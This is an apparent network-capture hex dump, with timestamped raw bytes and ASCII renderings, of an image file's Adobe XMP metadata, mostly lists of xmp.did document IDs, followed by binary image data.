2d 61 34 32 64 2d 33 62 30 37 38 30 63 64 34 66 63 61 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 34 64 35 65
                                                                                                                                                                                    Data Ascii: id:4c92dbaf-2094-438d-8856-556174de928c</rdf:li> <rdf:li>xmp.did:4cb74b19-7ff9-ca44-8369-df21d0929075</rdf:li> <rdf:li>xmp.did:4cc8fbc0-73d7-44e4-9b29-08651e81c913</rdf:li> <rdf:li>xmp.did:4ce6a969-7244-4f03-a42d-3b0780cd4fca</rdf:li> <rdf:li>xmp.did:4d5e
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5061INData Raw: 64 38 2d 39 66 34 30 2d 62 39 65 63 2d 39 36 62 66 66 61 31 30 39 36 62 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 35 35 37 33 64 36 30 66 2d 64 39 62 63 2d 34 38 32 66 2d 39 35 32 30 2d 32 36 63 61 64 39 32 38 39 37 33 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 35 35 38 37 44 38 44 32 30 39 38 44 45 32 31 31 42 42 30 31 41 39 33 38 44 37 38 33 38 43 46 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 35 35 38 39 31 32 39 45 30 38 32 30 36 38 31 31 39 32 42 30 44 45 36 45 32 32 44 33 34 44 30 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 35 35 39 45 41 32 30 46 30 37 32 34 36 38 31 31 42 39 45 37 41 31 39 33 37 31
                                                                                                                                                                                    Data Ascii: d8-9f40-b9ec-96bffa1096b9</rdf:li> <rdf:li>xmp.did:5573d60f-d9bc-482f-9520-26cad9289734</rdf:li> <rdf:li>xmp.did:5587D8D2098DE211BB01A938D7838CF8</rdf:li> <rdf:li>xmp.did:5589129E0820681192B0DE6E22D34D0A</rdf:li> <rdf:li>xmp.did:559EA20F07246811B9E7A19371
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5077INData Raw: 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 36 35 32 46 44 39 46 46 41 38 32 30 36 38 31 31 39 39 34 43 45 32 32 39 41 34 44 34 44 34 45 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 36 35 33 32 38 41 39 42 30 44 33 32 36 38 31 31 39 39 34 43 41 46 39 38 44 33 34 36 44 39 38 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 36 35 35 32 32 63 64 38 2d 64 65 32 34 2d 34 34 64 33 2d 62 63 62 61 2d 34 33 37 38 61 35 64 35 36 34 63 64 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 36 35 35 33 62 36 37 36 2d 37 35 64 62 2d 37 35 34 35 2d 39 31 38 37 2d 30 35 64 35 31 39 62 31 31 32 38 64 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69
                                                                                                                                                                                    Data Ascii: <rdf:li>xmp.did:652FD9FFA8206811994CE229A4D4D4EC</rdf:li> <rdf:li>xmp.did:65328A9B0D326811994CAF98D346D98E</rdf:li> <rdf:li>xmp.did:65522cd8-de24-44d3-bcba-4378a5d564cd</rdf:li> <rdf:li>xmp.did:6553b676-75db-7545-9187-05d519b1128d</rdf:li> <rdf:li>xmp.di
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5093INData Raw: 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 37 34 31 31 37 46 45 31 32 30 30 37 31 31 36 38 38 44 36 39 42 33 45 43 30 43 41 34 45 33 34 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 37 34 31 31 37 46 45 37 32 30 30 37 31 31 36 38 42 34 46 32 45 43 30 31 32 43 36 42 45 32 45 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 37 34 31 31 37 46 46 34 32 30 30 37 31 31 36 38 42 31 41 34 43 39 36 46 43 44 33 32 30 44 41 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 37 34 31 45 33 44 35 36 34 36 32 32 36 38 31 31 38 37 31 46 39 36 36 42 33 30 34 30 34 34 46 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 37 34 31 62 63 33 32 31
                                                                                                                                                                                    Data Ascii: rdf:li>xmp.did:74117FE1200711688D69B3EC0CA4E348</rdf:li> <rdf:li>xmp.did:74117FE720071168B4F2EC012C6BE2EA</rdf:li> <rdf:li>xmp.did:74117FF420071168B1A4C96FCD320DA7</rdf:li> <rdf:li>xmp.did:741E3D5646226811871F966B304044F9</rdf:li> <rdf:li>xmp.did:741bc321
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5101INData Raw: 46 45 45 41 36 46 39 30 31 33 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 37 43 42 35 35 38 38 30 30 38 32 30 36 38 31 31 39 31 30 39 46 41 34 45 35 45 38 45 42 34 38 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 37 43 42 43 46 41 33 37 46 37 32 30 36 38 31 31 41 46 46 44 43 32 38 41 44 36 41 34 45 41 30 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 37 43 43 35 32 34 35 43 43 33 32 30 36 38 31 31 38 41 36 44 39 39 30 33 46 36 36 44 38 35 35 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 37 43 45 35 34 42 41 36 46 45 30 30 45 33 31 31 38 35 32 44 41 34 41 43 34 35 32 33 44 37 46 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72
                                                                                                                                                                                    Data Ascii: FEEA6F90131</rdf:li> <rdf:li>xmp.did:7CB55880082068119109FA4E5E8EB485</rdf:li> <rdf:li>xmp.did:7CBCFA37F7206811AFFDC28AD6A4EA09</rdf:li> <rdf:li>xmp.did:7CC5245CC32068118A6D9903F66D8554</rdf:li> <rdf:li>xmp.did:7CE54BA6FE00E311852DA4AC4523D7F2</rdf:li> <r
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5117INData Raw: 39 45 34 31 38 46 34 35 35 43 35 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 38 41 44 43 43 30 30 35 31 33 32 30 36 38 31 31 39 39 34 43 45 38 35 41 34 35 32 46 30 34 36 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 38 41 45 34 35 38 33 42 41 42 32 30 36 38 31 31 38 32 32 41 44 36 38 43 30 34 37 39 37 31 41 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 38 41 45 46 32 41 36 33 30 38 32 30 36 38 31 31 38 32 32 41 38 34 31 33 37 30 36 44 36 39 39 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 38 41 46 38 37 37 42 38 30 37 32 30 36 38 31 31 39 32 42 30 45 39 30 44 30 34 38 45 41 37 32 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c
                                                                                                                                                                                    Data Ascii: 9E418F455C5D</rdf:li> <rdf:li>xmp.did:8ADCC00513206811994CE85A452F046A</rdf:li> <rdf:li>xmp.did:8AE4583BAB206811822AD68C047971A8</rdf:li> <rdf:li>xmp.did:8AEF2A6308206811822A8413706D6998</rdf:li> <rdf:li>xmp.did:8AF877B80720681192B0E90D048EA72C</rdf:li> <
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5133INData Raw: 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 39 38 35 31 66 61 64 38 2d 37 36 30 63 2d 36 38 34 33 2d 62 36 37 33 2d 66 37 63 62 38 39 61 38 65 31 65 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 39 38 35 41 36 38 42 45 30 37 32 30 36 38 31 31 39 32 42 30 45 39 30 44 30 34 38 45 41 37 32 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 39 38 36 61 38 32 38 38 2d 33 30 62 30 2d 61 65 34 65 2d 61 30 37 64 2d 63 38 61 62 36 39 31 30 39 35 35 64 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 39 38 38 33 34 30 39 66 2d 36 62 61 36 2d 31 32 34 62 2d 61 30 39 37 2d 33 38 63 65 37 66 61 35 32 38 32 61 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78
                                                                                                                                                                                    Data Ascii: > <rdf:li>xmp.did:9851fad8-760c-6843-b673-f7cb89a8e1e0</rdf:li> <rdf:li>xmp.did:985A68BE0720681192B0E90D048EA72C</rdf:li> <rdf:li>xmp.did:986a8288-30b0-ae4e-a07d-c8ab6910955d</rdf:li> <rdf:li>xmp.did:9883409f-6ba6-124b-a097-38ce7fa5282a</rdf:li> <rdf:li>x
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5140INData Raw: 36 42 46 44 39 33 39 30 30 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 41 30 43 31 32 34 39 35 30 41 32 30 36 38 31 31 42 34 42 43 43 32 41 38 45 42 43 37 38 31 33 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 41 30 43 38 46 34 34 30 37 44 32 32 36 38 31 31 39 37 41 35 45 34 46 36 45 38 44 43 41 45 38 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 41 30 43 42 46 43 45 31 39 33 32 30 36 38 31 31 41 42 30 38 38 41 31 38 34 32 37 43 38 39 43 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 41 30 44 44 39 32 41 30 37 44 32 30 36 38 31 31 39 32 42 30 44 30 41 37 35 38 31 35 46 38 41 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64
                                                                                                                                                                                    Data Ascii: 6BFD939003</rdf:li> <rdf:li>xmp.did:A0C124950A206811B4BCC2A8EBC78135</rdf:li> <rdf:li>xmp.did:A0C8F4407D22681197A5E4F6E8DCAE8F</rdf:li> <rdf:li>xmp.did:A0CBFCE193206811AB088A18427C89C8</rdf:li> <rdf:li>xmp.did:A0DD92A07D20681192B0D0A75815F8A6</rdf:li> <rd
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5156INData Raw: 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 42 38 42 38 31 38 42 46 30 46 32 30 36 38 31 31 38 41 36 44 46 36 42 33 36 41 33 44 44 38 44 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 42 38 42 42 42 34 43 38 42 38 46 37 45 31 31 31 38 34 31 45 39 30 42 39 34 39 31 42 38 43 39 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 42 38 45 38 36 39 36 38 32 42 32 30 36 38 31 31 41 46 43 39 43 31 36 31 39 33 38 42 36 46 38 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 42 38 45 46 34 45 32 41 46 43 32 33 36 38 31 31 39 39 34 43 43 30 31 36 36 35 33 41 38 42 44 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 42 38 46 37 34 37 42 37 32 37 32
                                                                                                                                                                                    Data Ascii: :li>xmp.did:B8B818BF0F2068118A6DF6B36A3DD8DE</rdf:li> <rdf:li>xmp.did:B8BBB4C8B8F7E111841E90B9491B8C96</rdf:li> <rdf:li>xmp.did:B8E869682B206811AFC9C161938B6F8A</rdf:li> <rdf:li>xmp.did:B8EF4E2AFC236811994CC016653A8BDD</rdf:li> <rdf:li>xmp.did:B8F747B7272
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5172INData Raw: 38 30 38 33 39 33 34 42 39 31 43 43 36 33 36 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 44 30 30 42 34 41 30 44 39 36 32 32 36 38 31 31 38 32 32 41 39 45 34 31 38 46 34 35 35 43 35 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 44 30 31 37 45 43 31 35 45 38 32 30 36 38 31 31 41 42 30 38 39 44 36 36 31 42 42 31 35 37 45 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 44 30 32 34 46 44 34 31 44 43 39 32 45 30 31 31 41 37 44 38 42 34 45 41 33 43 43 44 39 31 38 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 44 30 33 30 39 34 46 41 42 45 32 31 36 38 31 31 38 41 36 44 45 33 32 44 43 45 37 38 35 34 30 35 3c 2f 72 64 66 3a 6c
                                                                                                                                                                                    Data Ascii: 8083934B91CC636A</rdf:li> <rdf:li>xmp.did:D00B4A0D96226811822A9E418F455C5D</rdf:li> <rdf:li>xmp.did:D017EC15E8206811AB089D661BB157E8</rdf:li> <rdf:li>xmp.did:D024FD41DC92E011A7D8B4EA3CCD9187</rdf:li> <rdf:li>xmp.did:D03094FABE2168118A6DE32DCE785405</rdf:l
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5180INData Raw: 38 31 42 35 36 32 36 43 34 32 31 36 38 31 31 41 34 35 36 46 46 38 34 37 32 32 37 33 31 33 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 44 38 32 38 43 46 33 32 32 33 32 31 36 38 31 31 42 41 37 32 46 39 44 44 43 38 46 46 32 36 42 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 44 38 33 30 39 34 46 41 42 45 32 31 36 38 31 31 38 41 36 44 45 33 32 44 43 45 37 38 35 34 30 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 44 38 33 32 42 39 39 30 43 35 32 31 36 38 31 31 38 41 36 44 43 33 36 41 39 35 36 43 37 37 31 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 44 38 34 38 46 34 35 31 46 36 32 36 36 38 31 31 38 43 31 34 46 31 45 38
                                                                                                                                                                                    Data Ascii: 81B5626C4216811A456FF8472273134</rdf:li> <rdf:li>xmp.did:D828CF3223216811BA72F9DDC8FF26BE</rdf:li> <rdf:li>xmp.did:D83094FABE2168118A6DE32DCE785405</rdf:li> <rdf:li>xmp.did:D832B990C52168118A6DC36A956C7715</rdf:li> <rdf:li>xmp.did:D848F451F62668118C14F1E8
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5292INData Raw: 35 45 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 31 42 42 44 37 44 36 39 32 46 44 45 32 31 31 39 43 38 45 42 31 42 39 33 38 45 33 30 38 45 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 31 44 44 42 37 35 35 46 30 32 30 36 38 31 31 38 37 31 46 44 46 41 43 34 39 36 35 33 34 35 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 31 46 34 43 44 30 30 35 32 39 45 45 31 31 31 38 34 46 39 43 30 34 45 34 44 44 37 46 38 34 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 32 30 39 36 31 36 35 39 43 30 44 31 31 45 35 41 38 43 35 44 45 43 41 42 39 35 45 33 39 36 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d
                                                                                                                                                                                    Data Ascii: 5EE</rdf:li> <rdf:li>xmp.did:F1BBD7D692FDE2119C8EB1B938E308EC</rdf:li> <rdf:li>xmp.did:F1DDB755F0206811871FDFAC49653455</rdf:li> <rdf:li>xmp.did:F1F4CD00529EE11184F9C04E4DD7F84B</rdf:li> <rdf:li>xmp.did:F20961659C0D11E5A8C5DECAB95E3969</rdf:li> <rdf:li>xm
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5324INData Raw: 3a 46 41 37 46 31 31 37 34 30 37 32 30 36 38 31 31 38 37 31 46 41 38 30 31 44 32 43 37 34 37 37 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 41 37 46 31 31 37 34 30 37 32 30 36 38 31 31 38 38 43 36 41 41 46 43 35 42 45 30 33 33 36 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 41 37 46 31 31 37 34 30 37 32 30 36 38 31 31 38 38 43 36 44 42 34 39 38 32 44 39 30 32 37 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 41 37 46 31 31 37 34 30 37 32 30 36 38 31 31 38 43 31 34 45 36 39 32 45 44 44 36 31 37 32 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 41 37 46 31 31 37 34 30 37 32 30 36 38 31 31 38 46 36 32 38 42
                                                                                                                                                                                    Data Ascii: :FA7F117407206811871FA801D2C74778</rdf:li> <rdf:li>xmp.did:FA7F11740720681188C6AAFC5BE03362</rdf:li> <rdf:li>xmp.did:FA7F11740720681188C6DB4982D90274</rdf:li> <rdf:li>xmp.did:FA7F1174072068118C14E692EDD61727</rdf:li> <rdf:li>xmp.did:FA7F1174072068118F628B
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5344INData Raw: 38 31 31 38 46 36 32 43 46 36 43 35 45 42 38 42 42 36 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 43 37 46 31 31 37 34 30 37 32 30 36 38 31 31 39 31 30 39 44 31 33 46 34 36 33 39 41 32 33 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 43 37 46 31 31 37 34 30 37 32 30 36 38 31 31 39 35 46 45 45 32 31 34 30 41 37 30 34 35 46 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 43 37 46 31 31 37 34 30 37 32 30 36 38 31 31 39 44 42 33 44 32 33 32 39 44 31 34 46 35 30 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 43 37 46 31 31 37 34 30 37 32 30 36 38 31 31 41 45 41 43 46 37 37 44 30 32 35 44 44 36 41 31 3c 2f 72 64
                                                                                                                                                                                    Data Ascii: 8118F62CF6C5EB8BB62</rdf:li> <rdf:li>xmp.did:FC7F1174072068119109D13F4639A231</rdf:li> <rdf:li>xmp.did:FC7F11740720681195FEE2140A7045F3</rdf:li> <rdf:li>xmp.did:FC7F1174072068119DB3D2329D14F507</rdf:li> <rdf:li>xmp.did:FC7F117407206811AEACF77D025DD6A1</rd
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5368INData Raw: 30 34 64 65 37 30 32 2d 37 65 65 39 2d 63 66 34 65 2d 61 32 63 36 2d 64 36 62 35 35 65 34 66 65 36 39 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 63 30 36 66 35 35 39 36 2d 39 31 35 66 2d 34 35 63 61 2d 61 63 62 37 2d 35 30 32 35 30 63 36 31 38 31 66 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 63 30 37 62 32 61 33 31 2d 39 33 63 31 2d 34 64 30 61 2d 61 31 63 36 2d 31 33 61 33 30 65 65 66 66 63 32 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 63 30 65 39 37 35 65 30 2d 36 39 61 62 2d 36 34 34 38 2d 38 36 62 66 2d 66 66 31 31 36 30 65 32 66 30 62 64 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 63 31 33 34 65 65 38 64
                                                                                                                                                                                    Data Ascii: 04de702-7ee9-cf4e-a2c6-d6b55e4fe690</rdf:li> <rdf:li>xmp.did:c06f5596-915f-45ca-acb7-50250c6181f5</rdf:li> <rdf:li>xmp.did:c07b2a31-93c1-4d0a-a1c6-13a30eeffc27</rdf:li> <rdf:li>xmp.did:c0e975e0-69ab-6448-86bf-ff1160e2f0bd</rdf:li> <rdf:li>xmp.did:c134ee8d
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5479INData Raw: 66 35 37 66 33 64 31 64 2d 34 62 63 63 2d 37 34 34 37 2d 61 62 30 39 2d 38 64 36 31 30 65 33 33 63 66 65 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 66 35 38 66 34 35 36 61 2d 34 33 38 37 2d 37 38 34 35 2d 61 64 39 65 2d 32 63 61 61 31 36 37 65 64 62 39 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 66 35 39 65 65 38 63 30 2d 62 37 37 62 2d 34 37 31 39 2d 62 61 63 34 2d 37 66 30 34 61 33 32 36 30 30 32 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 66 35 62 39 30 61 61 34 2d 32 66 37 38 2d 34 38 36 30 2d 62 39 30 33 2d 63 34 39 63 31 38 64 30 65 66 61 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 66 35 65 62 31 30 38
                                                                                                                                                                                    Data Ascii: f57f3d1d-4bcc-7447-ab09-8d610e33cfe7</rdf:li> <rdf:li>xmp.did:f58f456a-4387-7845-ad9e-2caa167edb90</rdf:li> <rdf:li>xmp.did:f59ee8c0-b77b-4719-bac4-7f04a3260024</rdf:li> <rdf:li>xmp.did:f5b90aa4-2f78-4860-b903-c49c18d0efa2</rdf:li> <rdf:li>xmp.did:f5eb108
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5510INData Raw: 02 68 00 d0 02 e8 00 d0 00 06 81 06 80 0d 03 0d 02 0d 03 0d 02 0d 03 0d 00 1a 00 34 00 68 00 d0 02 68 01 74 08 4d 00 2e 80 0d 03 0d 00 1a 04 1a 00 34 00 69 8c 34 80 4f 1d 30 17 40 06 90 09 4d 31 01 1a 00 5d 03 13 40 0b 4d 20 0d 00 03 40 84 d3 18 1d 21 0b 4d 31 89 4d 02 17 40 c2 9a 00 34 84 03 40 c2 9a 04 1a 06 1a 00 34 c0 34 00 68 00 d2 00 d3 10 69 0c 34 c4 1a 40 1a 00 34 0c 5f 0d 00 26 81 0b a0 62 69 80 b4 d2 10 68 18 68 00 d0 07 ff d3 d3 6b e9 8f 08 34 00 53 40 07 86 80 0a 68 00 d0 01 a0 03 40 83 40 c3 40 83 40 c3 40 83 40 c3 40 06 81 06 81 86 80 0d 02 0d 00 1a 06 1a 00 34 08 34 00 68 00 d0 01 a0 03 4c 02 9a 40 14 d0 01 a0 03 40 0b 4d 00 26 80 0d 00 2f 8e 80 0d 00 26 80 0a 68 00 d0 02 e8 18 68 10 68 00 d0 01 a0 03 40 06 80 0d 00 1a 00 34 00 1d 00 26 81
                                                                                                                                                                                    Data Ascii: h4hhtM.4i4O0@M1]@M @!M1M@4@44hi4@4_&bihhk4S@h@@@@@@@44hL@@M&/&hhh@4&
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5542INData Raw: 66 3b 17 4a f6 21 4f 87 3e 7e 47 6f 22 20 91 c7 13 14 ba a4 16 93 93 9e 9e ea 8e 9f 2e bc a6 ad e4 5d 77 5d 6b 55 d8 ea 51 44 51 e7 ee d8 52 62 26 d7 b8 b4 d0 cd 0a 05 6e ca d4 09 54 51 ad 34 f9 8b ee f2 ea 3c a7 db da 97 da 69 45 19 6c ba d8 60 18 d1 76 81 c8 92 e1 70 79 c7 02 3e c1 ee 7d dd 76 78 3d 95 7d f3 27 3e e8 9c 1a ec 7c f9 71 f6 b2 a9 3a 28 2e 6a 8c 0f 01 e2 f7 1f 8b 58 f9 74 6e d2 75 e8 ba 55 30 fe a4 f5 84 db 96 44 51 4d 92 61 86 36 a2 30 15 0b f1 25 81 5d cf bb af 95 db b5 de dc fb 51 d5 d8 f5 be fe a3 65 e6 a3 6d 10 33 f6 1c 46 3b 84 8e e3 52 d3 cc d4 f1 66 e7 93 f8 74 9f 90 da 85 c1 5d 88 db 46 74 f8 8d 16 e0 a8 a5 ef 69 45 78 06 20 b5 ca cb e6 8d 87 4e b8 56 c6 ac 9a 09 2e 36 0f d4 98 b2 71 67 4c 95 58 e7 99 2d 06 e6 00 d7 dd 53 5b bf 75
                                                                                                                                                                                    Data Ascii: f;J!O>~Go" .]w]kUQDQRb&nTQ4<iEl`vpy>}vx=}'>|q:(.jXtnuU0DQMa60%]Qem3F;Rft]FtiEx NV.6qgLX-S[u
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5558INData Raw: 40 05 34 00 68 01 34 c0 5d 00 26 80 17 40 06 90 06 98 06 80 0d 00 1a 40 1a 00 34 00 68 00 d0 04 2d df 3c e2 c0 e9 09 ae 49 8d 9a 35 f0 ba 9e 55 6f 7f dd d7 17 93 bf a2 85 f7 7a 1a d2 92 50 24 9b 8c 78 91 4e 88 c5 32 25 11 58 40 66 61 e0 97 b4 9e 6b f5 f1 b4 ae db a7 fc 67 a9 84 45 84 64 c3 b5 cc 18 38 11 99 1c 80 38 96 56 0c a1 eb ec 5e 66 d7 36 9d ef 55 fa 3c 14 94 e4 d5 e4 45 8b b9 aa c4 e6 8e 78 95 34 bc 80 38 af 10 79 38 eb ea 52 a7 97 54 ea fd f5 38 dd 9e b7 95 81 cc 2c 68 f1 95 a1 86 21 0a 2b 70 03 c1 85 3a f5 eb 68 4d 56 2c 72 ec 89 c0 f7 71 6f 11 93 ce 41 20 7e c1 e3 ad 7e 45 3d 48 eb 89 21 ac 0c 8f 3f d3 3a c2 f3 4c 0b 33 0a f1 b1 05 42 f9 8d 35 cb 7e cf ed c1 d1 8f 52 06 76 e5 80 99 a2 2c ec a2 af 17 05 8a 3b e8 3e 2c 87 5e a6 3e ef 46 b0 5b 2b
                                                                                                                                                                                    Data Ascii: @4h4]&@@4h-<I5UozP$xN2%X@fakgEd88V^f6U<Ex48y8RT8,h!+p:hMV,rqoA ~~E=H!?:L3B5~Rv,;>,^>F[+
